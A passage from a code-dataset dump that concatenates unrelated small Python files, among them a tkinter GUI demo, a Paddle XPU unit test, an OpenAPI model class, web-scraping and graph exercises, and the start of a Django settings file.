self.fileEntry.insert(0, 'Z:\\') # bogus path
self.fileEntry.config(state='readonly')
self.netwEntry.delete(0, tk.END)
self.netwEntry.insert(0, 'Z:\\Backup') # bogus path
# Combobox callback
def _combo(self, val=0):
value = self.combo.get()
self.scr.insert(tk.INSERT, value + '\n')
# Spinbox callback
def _spin(self):
value = self.spin.get()
self.scr.insert(tk.INSERT, value + '\n')
# Checkbox callback
def checkCallback(self, *ignoredArgs):
# only enable one checkbutton
if self.chVarUn.get(): self.check3.configure(state='disabled')
else: self.check3.configure(state='normal')
if self.chVarEn.get(): self.check2.configure(state='disabled')
else: self.check2.configure(state='normal')
# Radiobutton callback function
def radCall(self):
radSel=self.radVar.get()
if radSel == 0: self.mySQL2.configure(text=WIDGET_LABEL + 'in Blue')
elif radSel == 1: self.mySQL2.configure(text=WIDGET_LABEL + 'in Gold')
elif radSel == 2: self.mySQL2.configure(text=WIDGET_LABEL + 'in Red')
# Exit GUI cleanly
def _quit(self):
self.win.quit()
self.win.destroy()
exit()
def methodInAThread(self, numOfLoops=10):
for idx in range(numOfLoops):
sleep(1)
self.scr.insert(tk.INSERT, str(idx) + '\n')
sleep(1)
print('methodInAThread():', self.runT.isAlive())
# Running methods in Threads
def createThread(self, num):
self.runT = Thread(target=self.methodInAThread, args=[num])
self.runT.setDaemon(True)
self.runT.start()
print(self.runT)
print('createThread():', self.runT.isAlive())
# textBoxes are the Consumers of Queue data
writeT = Thread(target=self.useQueues, daemon=True)
writeT.start()
# Create Queue instance
def useQueues(self):
# Now using a class member Queue
while True:
qItem = self.guiQueue.get()
print(qItem)
self.scr.insert(tk.INSERT, qItem + '\n')
# Button callback
def insertQuote(self):
title = self.bookTitle.get()
page = self.pageNumber.get()
quote = self.quote.get(1.0, tk.END)
print(title)
print(quote)
self.mySQL.insertBooks(title, page, quote)
# Button callback
def getQuote(self):
allBooks = self.mySQL.showBooks()
print(allBooks)
self.quote.insert(tk.INSERT, allBooks)
# Button callback
def modifyQuote(self):
raise NotImplementedError("This still needs to be implemented for the SQL command.")
#####################################################################################
def createWidgets(self):
# Tab Control introduced here --------------------------------------
tabControl = ttk.Notebook(self.win) # Create Tab Control
tab1 = ttk.Frame(tabControl) # Create a tab
tabControl.add(tab1, text='MySQL') # Add the tab
tab2 = ttk.Frame(tabControl) # Add a second tab
tabControl.add(tab2, text='Widgets') # Make second tab visible
tabControl.pack(expand=1, fill="both") # Pack to make visible
# ~ Tab Control introduced here -----------------------------------------
# We are creating a container frame to hold all other widgets
self.mySQL = ttk.LabelFrame(tab1, text=' Python Database ')
self.mySQL.grid(column=0, row=0, padx=8, pady=4)
# Creating a Label
ttk.Label(self.mySQL, text="Book Title:").grid(column=0, row=0, sticky='W')
# Adding a Textbox Entry widget
book = tk.StringVar()
self.bookTitle = ttk.Entry(self.mySQL, width=34, textvariable=book)
self.bookTitle.grid(column=0, row=1, sticky='W')
# Adding a Textbox Entry widget
book1 = tk.StringVar()
self.bookTitle1 = ttk.Entry(self.mySQL, width=34, textvariable=book1)
self.bookTitle1.grid(column=0, row=2, sticky='W')
# Adding a Textbox Entry widget
book2 = tk.StringVar()
self.bookTitle2 = ttk.Entry(self.mySQL, width=34, textvariable=book2)
self.bookTitle2.grid(column=0, row=3, sticky='W')
# Creating a Label
ttk.Label(self.mySQL, text="Page:").grid(column=1, row=0, sticky='W')
# Adding a Textbox Entry widget
page = tk.StringVar()
self.pageNumber = ttk.Entry(self.mySQL, width=6, textvariable=page)
self.pageNumber.grid(column=1, row=1, sticky='W')
# Adding a Textbox Entry widget
page = tk.StringVar()
self.pageNumber1 = ttk.Entry(self.mySQL, width=6, textvariable=page)
self.pageNumber1.grid(column=1, row=2, sticky='W')
# Adding a Textbox Entry widget
page = tk.StringVar()
self.pageNumber2 = ttk.Entry(self.mySQL, width=6, textvariable=page)
self.pageNumber2.grid(column=1, row=3, sticky='W')
# Adding a Button
self.action = ttk.Button(self.mySQL, text="Insert Quote", command=self.insertQuote)
self.action.grid(column=2, row=1)
# Adding a Button
self.action1 = ttk.Button(self.mySQL, text="Get Quotes", command=self.getQuote)
self.action1.grid(column=2, row=2)
# Adding a Button
self.action2 = ttk.Button(self.mySQL, text="Mody Quote", command=self.modifyQuote)
self.action2.grid(column=2, row=3)
# Add some space around each widget
for child in self.mySQL.winfo_children():
child.grid_configure(padx=2, pady=4)
quoteFrame = ttk.LabelFrame(tab1, text=' Book Quotation ')
quoteFrame.grid(column=0, row=1, padx=8, pady=4)
# Using a scrolled Text control
quoteW = 40; quoteH = 6
self.quote = scrolledtext.ScrolledText(quoteFrame, width=quoteW, height=quoteH, wrap=tk.WORD)
self.quote.grid(column=0, row=8, sticky='WE', columnspan=3)
# Add some space around each widget
for child in quoteFrame.winfo_children():
child.grid_configure(padx=2, pady=4)
#======================================================================================================
# Tab Control 2
#======================================================================================================
# We are creating a container frame to hold all other widgets -- Tab2
self.mySQL2 = ttk.LabelFrame(tab2, text=WIDGET_LABEL)
self.mySQL2.grid(column=0, row=0, padx=8, pady=4)
# Creating three checkbuttons
self.chVarDis = tk.IntVar()
self.check1 = tk.Checkbutton(self.mySQL2, text="Disabled", variable=self.chVarDis, state='disabled')
self.check1.select()
self.check1.grid(column=0, row=0, sticky=tk.W)
self.chVarUn = tk.IntVar()
self.check2 = tk.Checkbutton(self.mySQL2, text="UnChecked", variable=self.chVarUn)
self.check2.deselect()
self.check2.grid(column=1, row=0, sticky=tk.W )
self.chVarEn = tk.IntVar()
self.check3 = tk.Checkbutton(self.mySQL2, text="Toggle", variable=self.chVarEn)
self.check3.deselect()
self.check3.grid(column=2, row=0, sticky=tk.W)
# trace the state of the two checkbuttons
self.chVarUn.trace('w', lambda unused0, unused1, unused2 : self.checkCallback())
self.chVarEn.trace('w', lambda unused0, unused1, unused2 : self.checkCallback())
# Radiobutton list
colors = ["Blue", "Gold", "Red"]
self.radVar = tk.IntVar()
# Selecting a non-existing index value for radVar
self.radVar.set(99)
# Creating all three Radiobutton widgets within one loop
for col in range(3):
curRad = 'rad' + str(col)
curRad = tk.Radiobutton(self.mySQL2, text=colors[col], variable=self.radVar, value=col, command=self.radCall)
curRad.grid(column=col, row=6, sticky=tk.W, columnspan=3)
# And now adding tooltips
ToolTip(curRad, 'This is a Radiobutton control.')
# Create a container to hold labels
labelsFrame = ttk.LabelFrame(self.mySQL2, text=' Labels within a Frame ')
labelsFrame.grid(column=0, row=7, pady=6)
# Place labels into the container element - vertically
ttk.Label(labelsFrame, text="Choose a number:").grid(column=0, row=0)
ttk.Label(labelsFrame, text="Label 2").grid(column=0, row=1)
# Add some space around each label
for child in labelsFrame.winfo_children():
child.grid_configure(padx=6, pady=1)
number = tk.StringVar()
self.combo = ttk.Combobox(self.mySQL2, width=12, textvariable=number)
self.combo['values'] = (1, 2, 4, 42, 100)
self.combo.grid(column=1, row=7, sticky=tk.W)
self.combo.current(0)
self.combo.bind('<<ComboboxSelected>>', self._combo)
# Adding a Spinbox widget using a set of values
self.spin = Spinbox(self.mySQL2, values=(1, 2, 4, 42, 100), width=5, bd=8, command=self._spin)
self.spin.grid(column=2, row=7, sticky='W,', padx=6, pady=1)
# Using a scrolled Text control
scrolW = 40; scrolH = 1
self.scr = scrolledtext.ScrolledText(self.mySQL2, width=scrolW, height=scrolH, wrap=tk.WORD)
self.scr.grid(column=0, row=8, sticky='WE', columnspan=3)
# Create Manage Files Frame ------------------------------------------------
mngFilesFrame = ttk.LabelFrame(tab2, text=' Manage Files: ')
mngFilesFrame.grid(column=0, row=1, sticky='WE', padx=10, pady=5)
# Button Callback
def getFileName():
print('hello from getFileName')
fDir = path.dirname(__file__)
fName = fd.askopenfilename(parent=self.win, initialdir=fDir)
print(fName)
self.fileEntry.config(state='enabled')
self.fileEntry.delete(0, tk.END)
self.fileEntry.insert(0, fName)
if len(fName) > self.entryLen:
self.fileEntry.config(width=len(fName) + 3)
# Add Widgets to Manage Files Frame
lb = ttk.Button(mngFilesFrame, text="Browse to File...", command=getFileName)
lb.grid(column=0, row=0, sticky=tk.W)
#-----------------------------------------------------
file = tk.StringVar()
self.entryLen = scrolW - 4
self.fileEntry = ttk.Entry(mngFilesFrame, width=self.entryLen, textvariable=file)
self.fileEntry.grid(column=1, row=0, sticky=tk.W)
#-----------------------------------------------------
logDir = tk.StringVar()
self.netwEntry = ttk.Entry(mngFilesFrame, width=self.entryLen, textvariable=logDir)
self.netwEntry.grid(column=1, row=1, sticky=tk.W)
def copyFile():
import shutil
src = self.fileEntry.get()
file = src.split('/')[-1]
dst = self.netwEntry.get() + '\\'+ file
try:
shutil.copy(src, dst)
mBox.showinfo('Copy File to Network', 'Succes: File copied.')
except FileNotFoundError as err:
mBox.showerror('Copy File to Network', '*** Failed to copy file! ***\n\n' + str(err))
except Exception as ex:
mBox.showerror('Copy File to Network', '*** Failed to copy file! ***\n\n' + str(ex))
cb = ttk.Button(mngFilesFrame, text="Copy File To : ", command=copyFile)
cb.grid(column=0, row=1, sticky=tk.E)
# Add some space around each label
for child in mngFilesFrame.winfo_children():
child.grid_configure(padx=6, pady=6)
# Creating a Menu Bar ==========================================================
menuBar = Menu(tab1)
self.win.config(menu=menuBar)
# Add menu items
fileMenu = Menu(menuBar, tearoff=0)
fileMenu.add_command(label="New")
fileMenu.add_separator()
fileMenu.add_command(label="Exit", command=self._quit)
menuBar.add_cascade(label="File", menu=fileMenu)
# Add another Menu to the Menu Bar and an item
helpMenu = Menu(menuBar, tearoff=0)
helpMenu.add_command(label="About")
menuBar.add_cascade(label="Help", menu=helpMenu)
# Change the main windows icon
self.win.iconbitmap('pyc.ico')
# Using tkinter Variable Classes
strData = tk.StringVar()
strData.set('Hello StringVar')
# It is not necessary to create a tk.StringVar()
strData = tk.StringVar()
strData = self.spin.get()
# Place cursor into name Entry
self.bookTitle.focus()
# Add a Tooltip to the Spinbox
ToolTip(self.spin, 'This is a Spin control.')
# Add Tooltips to more widgets
ToolTip(self.bookTitle, 'This is an Entry control.')
ToolTip(self.action, 'This is a Button control.')
ToolTip(self.scr, 'This is a ScrolledText control.')
#======================
# Start GUI
#======================
oop = OOP()
oop.win.mainloop()
| [
"[email protected]"
] | |
47b06042aeb032ae4e939d3b48da59ba5b47905c | ce083128fa87ca86c65059893aa8882d088461f5 | /python/flask-webservices-labs/flask-spyne-fc20-labs/examples-fc20-labs/.venv/bin/pserve | aa6ac24579b1b2bb05f169edd556d6441a8b4c09 | [] | no_license | marcosptf/fedora | 581a446e7f81d8ae9a260eafb92814bc486ee077 | 359db63ff1fa79696b7bc803bcfa0042bff8ab44 | refs/heads/master | 2023-04-06T14:53:40.378260 | 2023-03-26T00:47:52 | 2023-03-26T00:47:52 | 26,059,824 | 6 | 5 | null | 2022-12-08T00:43:21 | 2014-11-01T18:48:56 | null | UTF-8 | Python | false | false | 325 | #!/root/NetBeansProjects/fedora/python/flask-webservices-labs/flask-spyne-fc20-labs/examples-fc20-labs/.venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pyramid.scripts.pserve import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
0fdeff39871fc700ab63276af189ae59086ca209 | 9025fc04844a202f00e691728c87eb10906e87c3 | /Python/3/hue.py | 47ddef65c29489500d3964a4d7a381559351461c | [] | no_license | felipemarinho97/online-judge-exercices | e046e3fd951f4943c43e199f557d96f82d8ed286 | 28cff9b31431e1c1edeeba0b66689e871491ac0a | refs/heads/master | 2021-01-20T00:33:09.782364 | 2017-04-23T15:19:04 | 2017-04-23T15:19:04 | 89,148,286 | 0 | 0 | null | 2017-04-23T15:21:01 | 2017-04-23T14:34:29 | Python | UTF-8 | Python | false | false | 580 | py | # coding: utf-8
# Melhor Ataque
# Felipe Marinho (C) | 116110223 | <[email protected]>
times = int(raw_input())
lista_times = []
lista_gols = []
total_gols = 0
maior = -1
for i in range(times) :
time = raw_input()
lista_times.append(time)
gols = int(raw_input())
lista_gols.append(gols)
total_gols += gols
if lista_gols[i] > maior :
maior = gols
print """Time(s) com melhor ataque (%i gol(s)):""" % maior
for i in range(times) :
if lista_gols[i] == maior :
print lista_times[i]
print ""
print "Média de gols marcados: %.1f" % (total_gols/float(times))
| [
"[email protected]"
] | |
0d68ac6e207b37d788e51c89ec289b18727b302d | c22c83592571b64c3da4a3f3c4d1bbaaee50a318 | /encryption.py | ea49016c24dde788787f3a42249522bd0f17076a | [] | no_license | tt-n-walters/thebridge-week1 | eaef2887122dd4f778ab94ab3c819f1e63a1985f | 8598125af12b21794e93f09407984009c36aaf25 | refs/heads/master | 2023-06-16T14:31:45.955254 | 2021-07-09T12:14:40 | 2021-07-09T12:14:40 | 382,301,941 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 180 | py | import hashlib
password = "password1"
encoded_password = password.encode()
encrypted = hashlib.sha256(encoded_password).hexdigest()
# https://resources.nicowalters.repl.co/hash
| [
"[email protected]"
] | |
ccfd104c316ff6d373be371b1562c7625f50c37c | 41f09c4f9990f8d2ce57aef92be1580f8a541656 | /show_lbiflist.py | 69778715a9ac37d8e3b06516f36e4ea83cfb6002 | [] | no_license | jebpublic/pybvccmds | d3111efe6f449c3565d3d7f1c358bdd36bc1a01a | 997eead4faebf3705a83ce63b82d853730b23fbf | refs/heads/master | 2016-09-05T18:56:52.509806 | 2015-02-25T17:41:47 | 2015-02-25T17:41:47 | 31,315,416 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,472 | py | #!/usr/bin/python
import sys
import json
import pybvc
from pybvc.netconfdev.vrouter.vrouter5600 import VRouter5600
from pybvc.common.status import STATUS
from pybvc.controller.controller import Controller
from pybvc.common.utils import load_dict_from_file
if __name__ == "__main__":
f = "cfg.yml"
d = {}
if(load_dict_from_file(f, d) == False):
print("Config file '%s' read error: " % f)
exit()
try:
ctrlIpAddr = d['ctrlIpAddr']
ctrlPortNum = d['ctrlPortNum']
ctrlUname = d['ctrlUname']
ctrlPswd = d['ctrlPswd']
nodeName = d['nodeName']
nodeIpAddr = d['nodeIpAddr']
nodePortNum = d['nodePortNum']
nodeUname = d['nodeUname']
nodePswd = d['nodePswd']
except:
print ("Failed to get Controller device attributes")
exit(0)
ctrl = Controller(ctrlIpAddr, ctrlPortNum, ctrlUname, ctrlPswd)
vrouter = VRouter5600(ctrl, nodeName, nodeIpAddr, nodePortNum, nodeUname, nodePswd)
print ("<<< 'Controller': %s, '%s': %s" % (ctrlIpAddr, nodeName, nodeIpAddr))
result = vrouter.get_loopback_interfaces_list()
status = result[0]
if(status.eq(STATUS.OK) == True):
print "Loopback interfaces:"
dpIfList = result[1]
print json.dumps(dpIfList, indent=4)
else:
print ("\n")
print ("!!!Failed, reason: %s" % status.brief().lower())
print ("%s" % status.detail())
sys.exit(0)
| [
"[email protected]"
] | |
17aec2e9e4241eb7c8589ae7042a57c2077d973f | 209c876b1e248fd67bd156a137d961a6610f93c7 | /python/paddle/fluid/tests/unittests/xpu/test_reduce_max_op_xpu.py | 9256b135ba8d04c2c3984633b176dd0a68c66765 | [
"Apache-2.0"
] | permissive | Qengineering/Paddle | 36e0dba37d29146ebef4fba869490ecedbf4294e | 591456c69b76ee96d04b7d15dca6bb8080301f21 | refs/heads/develop | 2023-01-24T12:40:04.551345 | 2022-10-06T10:30:56 | 2022-10-06T10:30:56 | 544,837,444 | 0 | 0 | Apache-2.0 | 2022-10-03T10:12:54 | 2022-10-03T10:12:54 | null | UTF-8 | Python | false | false | 2,573 | py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy as np
import sys
sys.path.append("..")
import paddle
from op_test import OpTest
from op_test_xpu import XPUOpTest
from xpu.get_test_cover_info import create_test_class, get_xpu_op_support_types, XPUOpTestWrapper
paddle.enable_static()
class XPUTestReduceMaxOp(XPUOpTestWrapper):
def __init__(self):
self.op_name = 'reduce_max'
class XPUTestReduceMaxBase(XPUOpTest):
def setUp(self):
self.place = paddle.XPUPlace(0)
self.init_case()
self.set_case()
def set_case(self):
self.op_type = 'reduce_max'
self.attrs = {
'use_xpu': True,
'reduce_all': self.reduce_all,
'keep_dim': self.keep_dim
}
self.inputs = {'X': np.random.random(self.shape).astype("float32")}
if self.attrs['reduce_all']:
self.outputs = {'Out': self.inputs['X'].max()}
else:
self.outputs = {
'Out':
self.inputs['X'].max(axis=self.axis,
keepdims=self.attrs['keep_dim'])
}
def init_case(self):
self.shape = (5, 6, 10)
self.axis = (0, )
self.reduce_all = False
self.keep_dim = False
def test_check_output(self):
self.check_output_with_place(self.place)
def test_check_grad(self):
self.check_grad_with_place(self.place, ['X'], 'Out')
class XPUTestReduceMaxCase1(XPUTestReduceMaxBase):
def init_case(self):
self.shape = (5, 6, 10)
self.axis = (0, )
self.reduce_all = False
self.keep_dim = True
support_types = get_xpu_op_support_types('reduce_max')
for stype in support_types:
create_test_class(globals(), XPUTestReduceMaxOp, stype)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
95f07028ed1317b33c687e3f152ed408d54accea | 0d2f636592dc12458254d793f342857298c26f12 | /11-2(tag).py | 1baa801108cd7920160b82b12b955e92548f7030 | [] | no_license | chenpc1214/test | c6b545dbe13e672f11c58464405e024394fc755b | 8610320686c499be2f5fa36ba9f11935aa6d657b | refs/heads/master | 2022-12-13T22:44:41.256315 | 2020-09-08T16:25:49 | 2020-09-08T16:25:49 | 255,796,035 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | def mymax(n1,n2):
if n1 > n2:
print("較大值是 : ", n1)
else:
print("較大值是 : ", n2)
x1,x2 = eval(input("請輸入2個數值:"))
mymax(x1,x2)
"""自己做的
def mymax(n1,n2):
print("最大值為:",max(n1,n2))
a = input("請輸入2個數值:")
mymax(a,b)"""
| [
"[email protected]"
] | |
b8fd4f4290f8a0877f2b1b3efb49106e25a3f001 | 43ab33b2f50e47f5dbe322daa03c86a99e5ee77c | /rcc/models/od_mcomplex_type_definition_method_def.py | 07a0da5592495c471d676699b1ab4f6c2e885f62 | [] | no_license | Sage-Bionetworks/rcc-client | c770432de2d2950e00f7c7bd2bac22f3a81c2061 | 57c4a621aecd3a2f3f9faaa94f53b2727992a01a | refs/heads/main | 2023-02-23T05:55:39.279352 | 2021-01-21T02:06:08 | 2021-01-21T02:06:08 | 331,486,099 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,896 | py | # coding: utf-8
"""
nPhase REST Resource
REDCap REST API v.2 # noqa: E501
The version of the OpenAPI document: 2.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from rcc.configuration import Configuration
class ODMcomplexTypeDefinitionMethodDef(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'description': 'ODMcomplexTypeDefinitionDescription',
'formal_expression': 'list[ODMcomplexTypeDefinitionFormalExpression]',
'alias': 'list[ODMcomplexTypeDefinitionAlias]',
'oid': 'str',
'name': 'str',
'type': 'str'
}
attribute_map = {
'description': 'description',
'formal_expression': 'formalExpression',
'alias': 'alias',
'oid': 'oid',
'name': 'name',
'type': 'type'
}
def __init__(self, description=None, formal_expression=None, alias=None, oid=None, name=None, type=None, local_vars_configuration=None): # noqa: E501
"""ODMcomplexTypeDefinitionMethodDef - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._description = None
self._formal_expression = None
self._alias = None
self._oid = None
self._name = None
self._type = None
self.discriminator = None
self.description = description
if formal_expression is not None:
self.formal_expression = formal_expression
if alias is not None:
self.alias = alias
if oid is not None:
self.oid = oid
if name is not None:
self.name = name
if type is not None:
self.type = type
@property
def description(self):
"""Gets the description of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:return: The description of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:rtype: ODMcomplexTypeDefinitionDescription
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this ODMcomplexTypeDefinitionMethodDef.
:param description: The description of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:type: ODMcomplexTypeDefinitionDescription
"""
if self.local_vars_configuration.client_side_validation and description is None: # noqa: E501
raise ValueError("Invalid value for `description`, must not be `None`") # noqa: E501
self._description = description
@property
def formal_expression(self):
"""Gets the formal_expression of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:return: The formal_expression of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:rtype: list[ODMcomplexTypeDefinitionFormalExpression]
"""
return self._formal_expression
@formal_expression.setter
def formal_expression(self, formal_expression):
"""Sets the formal_expression of this ODMcomplexTypeDefinitionMethodDef.
:param formal_expression: The formal_expression of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:type: list[ODMcomplexTypeDefinitionFormalExpression]
"""
self._formal_expression = formal_expression
@property
def alias(self):
"""Gets the alias of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:return: The alias of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:rtype: list[ODMcomplexTypeDefinitionAlias]
"""
return self._alias
@alias.setter
def alias(self, alias):
"""Sets the alias of this ODMcomplexTypeDefinitionMethodDef.
:param alias: The alias of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:type: list[ODMcomplexTypeDefinitionAlias]
"""
self._alias = alias
@property
def oid(self):
"""Gets the oid of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:return: The oid of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:rtype: str
"""
return self._oid
@oid.setter
def oid(self, oid):
"""Sets the oid of this ODMcomplexTypeDefinitionMethodDef.
:param oid: The oid of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:type: str
"""
self._oid = oid
@property
def name(self):
"""Gets the name of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:return: The name of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this ODMcomplexTypeDefinitionMethodDef.
:param name: The name of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:type: str
"""
self._name = name
@property
def type(self):
"""Gets the type of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:return: The type of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this ODMcomplexTypeDefinitionMethodDef.
:param type: The type of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:type: str
"""
allowed_values = ["COMPUTATION", "IMPUTATION", "TRANSPOSE", "OTHER"] # noqa: E501
if self.local_vars_configuration.client_side_validation and type not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `type` ({0}), must be one of {1}" # noqa: E501
.format(type, allowed_values)
)
self._type = type
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ODMcomplexTypeDefinitionMethodDef):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ODMcomplexTypeDefinitionMethodDef):
return True
return self.to_dict() != other.to_dict()
| [
"[email protected]"
] | |
95edf831f37b676ba3fb2731a59d15664766b478 | 3c099a78896ca4b775d28fccf38c2bfdf6a1a555 | /zMiscellaneous/WebScraping/ScrapingEcommerce.py | 91e6ae08778622a1632ba801532cb50101916bff | [] | no_license | anmolparida/selenium_python | db21215837592dbafca5cced7aecb1421395ed41 | 78aec8bf34d53b19fb723a124ad13342c6ce641c | refs/heads/master | 2022-12-03T23:52:32.848674 | 2020-08-30T19:26:30 | 2020-08-30T19:26:30 | 282,207,788 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,366 | py | import requests
from bs4 import BeautifulSoup
# Getting Value from the First Page
url = 'https://scrapingclub.com/exercise/list_basic/?page=1'
response = requests.get(url)
soup = BeautifulSoup(response.text, 'lxml')
items = soup.find_all('div', class_='col-lg-4 col-md-6 mb-4')
count = 0
for i in items:
itemName = i.find('h4', class_='card-title').text.strip('\n')
itemPrice = i.find('h5').text
count = count + 1
print(str(count) + '. itemPrice: ' + itemPrice, 'itemName: ' + itemName)
# Getting Value from the All the Pages
pages = soup.find('ul', class_='pagination')
urls = []
links = pages.find_all('a', class_='page-link')
for link in links:
pageNum = int(link.text) if link.text.isdigit() else None
if pageNum is not None:
x = link.get('href')
urls.append(x)
print(urls)
print('\nGetting Value from the All the Pages')
count = 0
for i in urls:
newURL = url + i
response = requests.get(newURL)
soup = BeautifulSoup(response.text, 'lxml')
items = soup.find_all('div', class_='col-lg-4 col-md-6 mb-4')
for i in items:
itemName = i.find('h4', class_='card-title').text.strip('\n')
itemPrice = i.find('h5').text
count = count + 1
print(str(count) + '. itemPrice: ' + itemPrice, 'itemName: ' + itemName) | [
"[email protected]"
] | |
6bdee705a979426573bc0d836de6cc21f8c69502 | a14dd601cde67f67d0ba38dfd1362f7c0109cef1 | /graphs/past/perfect-friends.py | 84d3237c7bc95823da7474a6ccbd297330ad8192 | [] | no_license | Meaha7/dsa | d5ea1615f05dae32671af1f1c112f0c759056473 | fa80219ff8a6f4429fcf104310f4169d007af712 | refs/heads/main | 2023-09-03T18:52:41.950294 | 2021-11-05T09:14:42 | 2021-11-05T09:14:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 565 | py | from collections import defaultdict
from graphs.util import build
def dfs(graph, src, vis):
vis.add(src)
count = 1
for nbr in graph[src]:
if nbr not in vis:
count += dfs(graph, nbr, vis)
return count
def main(edges):
graph, vis = build(edges), set()
csl = []
for src in graph.keys():
if src not in vis:
csl.append(dfs(graph, src, vis))
return sum([csl[i] * sum(csl[i + 1:]) for i in range(len(csl))])
for edges in [
[(0, 1), (2, 3), (4, 5), (5, 6), (4, 6)]
]:
print(main(edges))
| [
"[email protected]"
] | |
d47d43472d31e0e542659aeb3cc520cb97087223 | 1643a5a0d1acd3bdc851718c223ba0b14bbec1c3 | /backend/rn_push_notificatio_27417/settings.py | 0f648a30594df5a74b623cf3269344d5cfcda383 | [] | no_license | crowdbotics-apps/rn-push-notificatio-27417 | 90c614ad558b2810e2b2cfe55e2dae7b97f1359e | ea9c37615be4e9e872a63d226562e4ca7bc2b6c5 | refs/heads/master | 2023-05-23T06:29:28.261563 | 2021-05-27T12:29:04 | 2021-05-27T12:29:04 | 370,993,920 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,141 | py | """
Django settings for rn_push_notificatio_27417 project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
import logging
env = environ.Env()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DEBUG", default=False)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str("SECRET_KEY")
ALLOWED_HOSTS = env.list("HOST", default=["*"])
SITE_ID = 1
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_SSL_REDIRECT = env.bool("SECURE_REDIRECT", default=False)
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites'
]
LOCAL_APPS = [
'home',
'modules',
'users.apps.UsersConfig',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'rest_auth.registration',
'bootstrap4',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
'django_extensions',
'drf_yasg',
'storages',
# start fcm_django push notifications
'fcm_django',
# end fcm_django push notifications
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'rn_push_notificatio_27417.urls'
TEMPLATES = [
{
